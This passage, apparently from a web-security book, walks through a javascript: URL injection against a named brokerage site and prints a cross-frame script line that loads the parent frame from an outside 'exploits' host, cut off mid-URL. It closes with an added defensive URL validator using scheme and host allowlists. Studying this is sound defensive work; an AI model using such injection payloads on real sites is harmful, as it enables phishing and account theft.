
D. Waterhouse. But a problem like that only makes us want to investigate further.
Remembering that javascript: is considered a registered protocol by browsers, let’s
try this (see Figure 5.14):
www.tdwaterhouse.com/research/wsod.asp?javascript:alert("test")
Figure 5.14 Registered Protocol Works!
From an attacker’s perspective, this is very good news. We can combine this with our
cross-frame trick: since we already have access to the content frame, and the
javascript: handler gives us script execution, we can easily control the parent frame
as well. The code to do this is where the DOM element interfacing applies:
parent.frames[0].location=
"http://ip.securescience.net/exploits/tdwaterhouse/webbroker1.tdwaterhouse.c ...
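The root cause on the application side is that a URL taken from a query parameter is loaded into a frame without checking its scheme or destination. The following validator, an added example that is not from the book, shows the check a site should apply before using such a parameter; the host `www.example-broker.test` and the function name `safeFrameTarget` are constructed for illustration.

```javascript
// Added example: validate a user-supplied URL before loading it into a frame
// or using it as a redirect target. Scheme and host are taken from the parsed
// URL, never from prefix-matching the raw string.
const ALLOWED_HOSTS = new Set(["www.example-broker.test"]); // constructed
const ALLOWED_SCHEMES = new Set(["https:"]);
const BASE = "https://www.example-broker.test/"; // constructed

// Returns the normalised absolute URL to load, or null if it must be refused.
function safeFrameTarget(rawParam, base = BASE) {
  if (typeof rawParam !== "string" || rawParam.length === 0) return null;

  // The WHATWG parser drops ASCII tab/newline from the input and lowercases the
  // scheme, so "java\tscript:" and "JavaScript:" both parse as javascript:.
  // Strip them explicitly too so the behaviour does not depend on the runtime.
  const cleaned = rawParam.replace(/[\t\n\r]/g, "");

  let url;
  try {
    // Relative paths resolve against our own origin; absolute URLs keep theirs.
    url = new URL(cleaned, base);
  } catch {
    return null; // unparsable input is refused rather than passed through
  }

  // javascript:, data:, vbscript:, file: and plain http: all fail this check.
  if (!ALLOWED_SCHEMES.has(url.protocol)) return null;

  // Protocol-relative input ("//other.host/x") gets its own host, so the
  // allowlist must be applied to the parsed hostname, not to the raw string.
  if (!ALLOWED_HOSTS.has(url.hostname)) return null;

  // Refuse userinfo: "https://www.example-broker.test@other.host/" style input
  // is already caught by the host check, but there is no legitimate use for it.
  if (url.username || url.password) return null;

  return url.href;
}

module.exports = { safeFrameTarget };
```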